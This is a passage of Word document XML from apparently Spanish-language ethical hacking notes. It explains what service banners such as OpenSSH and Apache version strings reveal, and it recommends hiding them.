                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00954398">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
              <w:t>SSH-2.0-OpenSSH_7.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="06C80A1B" w14:textId="792A0D57" w:rsidR="00954398" w:rsidRPr="00954398" w:rsidRDefault="00954398" w:rsidP="00954398">
      <w:r w:rsidRPr="00954398">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>☝️</w:t>
      </w:r>
      <w:r w:rsidRPr="00954398">
        <w:t xml:space="preserve"> Ese es el </w:t>
      </w:r>
      <w:r w:rsidRPr="00954398">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>banner</w:t>
      </w:r>
      <w:r w:rsidRPr="00954398">
        <w:t xml:space="preserve"> = "Hola, soy OpenSSH versión 7.4"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8B2A95" w14:textId="77777777" w:rsidR="00954398" w:rsidRPr="00954398" w:rsidRDefault="00954398" w:rsidP="00954398">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00954398">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Otro ejemplo (puerto 80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0DAA" w:rsidRPr="00B941CC" w14:paraId="1C49DD51" w14:textId="77777777" w:rsidTr="004C0DAA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06EC2471" w14:textId="77777777" w:rsidR="004C0DAA" w:rsidRPr="004C0DAA" w:rsidRDefault="004C0DAA" w:rsidP="004C0DAA">
            <w:r w:rsidRPr="004C0DAA">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">Te conectas </w:t>
            </w:r>
            <w:r w:rsidRPr="004C0DAA">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>→</w:t>
            </w:r>
            <w:r w:rsidRPr="004C0DAA">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> servidor.com:80</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C3EB15C" w14:textId="77777777" w:rsidR="004C0DAA" w:rsidRPr="004C0DAA" w:rsidRDefault="004C0DAA" w:rsidP="004C0DAA"/>
          <w:p w14:paraId="7C26D3A3" w14:textId="77777777" w:rsidR="004C0DAA" w:rsidRPr="004C0DAA" w:rsidRDefault="004C0DAA" w:rsidP="004C0DAA">
            <w:r w:rsidRPr="004C0DAA">
              <w:t>Banner:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7891FD69" w14:textId="77777777" w:rsidR="004C0DAA" w:rsidRPr="004C0DAA" w:rsidRDefault="004C0DAA" w:rsidP="004C0DAA">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004C0DAA">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HTTP/1.1 200 OK</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13B3A640" w14:textId="77777777" w:rsidR="004C0DAA" w:rsidRPr="004C0DAA" w:rsidRDefault="004C0DAA" w:rsidP="004C0DAA">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004C0DAA">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Server: Apache/2.2.15 (CentOS)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2330A580" w14:textId="6DFD9786" w:rsidR="004C0DAA" w:rsidRPr="004C0DAA" w:rsidRDefault="004C0DAA" w:rsidP="004C0DAA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004C0DAA">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>X-Powered-By: PHP/5.3.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2696BEBB" w14:textId="77777777" w:rsidR="00C73FD2" w:rsidRDefault="00C73FD2" w:rsidP="00C73FD2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="149FB193" w14:textId="77777777" w:rsidR="004C0DAA" w:rsidRPr="004C0DAA" w:rsidRDefault="004C0DAA" w:rsidP="004C0DAA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C0DAA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>¿Por qué importa?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72417FFE" w14:textId="77777777" w:rsidR="004C0DAA" w:rsidRPr="004C0DAA" w:rsidRDefault="004C0DAA" w:rsidP="004C0DAA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C0DAA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">El banner </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0DAA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>revela:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D82577" w14:textId="77777777" w:rsidR="004C0DAA" w:rsidRPr="004C0DAA" w:rsidRDefault="004C0DAA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C0DAA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0DAA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Qué software usa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6022192D" w14:textId="77777777" w:rsidR="004C0DAA" w:rsidRPr="004C0DAA" w:rsidRDefault="004C0DAA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C0DAA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0DAA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Qué versión tiene</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172CB01D" w14:textId="77777777" w:rsidR="004C0DAA" w:rsidRPr="004C0DAA" w:rsidRDefault="004C0DAA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C0DAA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0DAA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sistema operativo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0022BFA5" w14:textId="47F4C728" w:rsidR="004C0DAA" w:rsidRDefault="004C0DAA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C0DAA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>❌</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0DAA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Posibles vulnerabilidades</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D2F12F" w14:textId="77777777" w:rsidR="009A31CF" w:rsidRPr="009A31CF" w:rsidRDefault="009A31CF" w:rsidP="009A31CF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A31CF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>En hacking ético:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FC8F85" w14:textId="494AAAB2" w:rsidR="009A31CF" w:rsidRPr="009A31CF" w:rsidRDefault="009A31CF" w:rsidP="009A31CF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A31CF">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="508355FD" wp14:editId="10283B1F">
            <wp:extent cx="4526280" cy="722528"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="5574810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810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3094" cy="7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2C1B" w14:textId="409AED40" w:rsidR="001E2EAD" w:rsidRPr="009A31CF" w:rsidRDefault="009A31CF" w:rsidP="009A31CF">
      <w:r w:rsidRPr="009A31CF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>En resumen:</w:t>
      </w:r>
      <w:r w:rsidRPr="009A31CF">
        <w:t xml:space="preserve"> Banner = tarjeta de presentación automática de un servicio que revela información técnica útil (o peligrosa si es vulnerable).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06457742" w14:textId="77777777" w:rsidR="001E2EAD" w:rsidRPr="009A31CF" w:rsidRDefault="001E2EAD" w:rsidP="00960D31">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A5946DD" w14:textId="77777777" w:rsidR="001E2EAD" w:rsidRPr="009A31CF" w:rsidRDefault="001E2EAD" w:rsidP="00960D31">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="534609AC" w14:textId="77777777" w:rsidR="001E2EAD" w:rsidRPr="009A31CF" w:rsidRDefault="001E2EAD" w:rsidP="00960D31">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01D9AEF3" w14:textId="77777777" w:rsidR="001E2EAD" w:rsidRDefault="001E2EAD" w:rsidP="00960D31">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B70A9BF" w14:textId="77777777" w:rsidR="009A31CF" w:rsidRDefault="009A31CF" w:rsidP="00960D31">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="553E503A" w14:textId="77777777" w:rsidR="009A31CF" w:rsidRDefault="009A31CF" w:rsidP="00960D31">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="632EB64C" w14:textId="41F0F19B" w:rsidR="009A31CF" w:rsidRPr="00C24100" w:rsidRDefault="009A31CF" w:rsidP="009A31CF">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C24100">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.1.4.</w:t>
      </w:r>
      <w:r w:rsidR="00F93CF1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="00C24100" w:rsidRPr="00C24100">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">🛡️ </w:t>
      </w:r>
      <w:r w:rsidRPr="00C24100">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>BANNER</w:t>
      </w:r>
      <w:r w:rsidR="00C24100" w:rsidRPr="00C24100">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> SEGURO (Anti-vulnerable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1CBE42" w14:textId="77777777" w:rsidR="00C24100" w:rsidRPr="00C24100" w:rsidRDefault="00C24100" w:rsidP="00C24100">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C24100">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Un banner seguro </w:t>
      </w:r>
      <w:r w:rsidRPr="00C24100">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>oculta información</w:t>
      </w:r>
      <w:r w:rsidRPr="00C24100">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> que podría ayudar a atacantes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF4B968" w14:textId="77777777" w:rsidR="00FE2B66" w:rsidRPr="00FE2B66" w:rsidRDefault="00FE2B66" w:rsidP="00FE2B66">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2B66">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>❌</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE2B66">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> BANNER VULNERABLE (Malo):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BDCB58" w14:textId="242D26AA" w:rsidR="009A31CF" w:rsidRDefault="00FE2B66" w:rsidP="00C24100">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2B66">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7330FF0D" wp14:editId="77D4DFDF">
            <wp:extent cx="4686300" cy="643498"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="16370581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8105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8532" cy="6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AA2C" w14:textId="77777777" w:rsidR="00FE2B66" w:rsidRDefault="00FE2B66" w:rsidP="00FE2B66">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2B66">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Problemas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07677707" w14:textId="77777777" w:rsidR="00FE2B66" w:rsidRPr="00FE2B66" w:rsidRDefault="00FE2B66">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2B66">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE2B66">
        <w:t xml:space="preserve"> Revela software exacto </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9369D7" w14:textId="77777777" w:rsidR="00FE2B66" w:rsidRPr="00FE2B66" w:rsidRDefault="00FE2B66">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2B66">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE2B66">
        <w:t xml:space="preserve"> Revela versi</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE2B66">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>ó</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE2B66">
        <w:t>n espec</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE2B66">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>í</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE2B66">
        <w:t xml:space="preserve">fica </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B07A6EF" w14:textId="77777777" w:rsidR="00FE2B66" w:rsidRPr="00FE2B66" w:rsidRDefault="00FE2B66">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2B66">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE2B66">
        <w:t xml:space="preserve"> Revela sistema operativo </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1C6B3B" w14:textId="28FD5DE3" w:rsidR="00FE2B66" w:rsidRPr="00FE2B66" w:rsidRDefault="00FE2B66">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2B66">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>❌</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE2B66">
        <w:t xml:space="preserve"> Atacante sabe exactamente qu</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE2B66">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>é</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE2B66">
        <w:t xml:space="preserve"> exploits usar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4055F44F" w14:textId="721E8046" w:rsidR="001E2EAD" w:rsidRDefault="001C6717" w:rsidP="001C6717">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C6717">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="172BEA74" wp14:editId="060CBA19">
            <wp:extent cx="5128260" cy="2205627"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="1994337918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37918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5359" cy="22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459D" w14:textId="4ADDC880" w:rsidR="001948D4" w:rsidRDefault="001948D4" w:rsidP="001C6717">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001948D4">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3961BB34" wp14:editId="0BFD9DF9">
            <wp:extent cx="4442460" cy="3031156"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="848887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873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7200" cy="30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3623" w14:textId="77777777" w:rsidR="00F74AB7" w:rsidRDefault="00F74AB7" w:rsidP="001C6717">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="116230F1" w14:textId="77777777" w:rsidR="00F74AB7" w:rsidRDefault="00F74AB7" w:rsidP="001C6717">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EDA8656" w14:textId="354DE08C" w:rsidR="001E2EAD" w:rsidRPr="009A31CF" w:rsidRDefault="00F74AB7" w:rsidP="004559A0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F74AB7">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CDA0D14" wp14:editId="6B45542F">
            <wp:extent cx="4541520" cy="2879660"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19400003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003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8592" cy="28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A0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="004559A0" w:rsidRPr="004559A0">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21396927" wp14:editId="781F8768">
            <wp:extent cx="4594860" cy="1288263"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="1468713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139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2941" cy="12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A0" w:rsidRPr="004559A0">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1362E97C" wp14:editId="5590F683">
            <wp:extent cx="4579620" cy="1343779"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="10624791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91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8083" cy="134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0C28" w14:textId="77777777" w:rsidR="001E2EAD" w:rsidRPr="009A31CF" w:rsidRDefault="001E2EAD" w:rsidP="00960D31">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CA5C8BD" w14:textId="77777777" w:rsidR="001E2EAD" w:rsidRDefault="001E2EAD" w:rsidP="00960D31">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3476C92F" w14:textId="77777777" w:rsidR="004559A0" w:rsidRDefault="004559A0" w:rsidP="00960D31">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CD9CAFC" w14:textId="77777777" w:rsidR="004559A0" w:rsidRDefault="004559A0" w:rsidP="00960D31">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48BD15D1" w14:textId="77777777" w:rsidR="004559A0" w:rsidRDefault="004559A0" w:rsidP="00960D31">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66CB012D" w14:textId="77777777" w:rsidR="004559A0" w:rsidRDefault="004559A0" w:rsidP="00960D31">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32CB2B98" w14:textId="77777777" w:rsidR="004559A0" w:rsidRDefault="004559A0" w:rsidP="00960D31">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="366C6E26" w14:textId="77777777" w:rsidR="004559A0" w:rsidRDefault="004559A0" w:rsidP="00960D31">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0916688F" w14:textId="77777777" w:rsidR="004559A0" w:rsidRDefault="004559A0" w:rsidP="00960D31">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FCB299C" w14:textId="77777777" w:rsidR="004559A0" w:rsidRDefault="004559A0" w:rsidP="00960D31">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
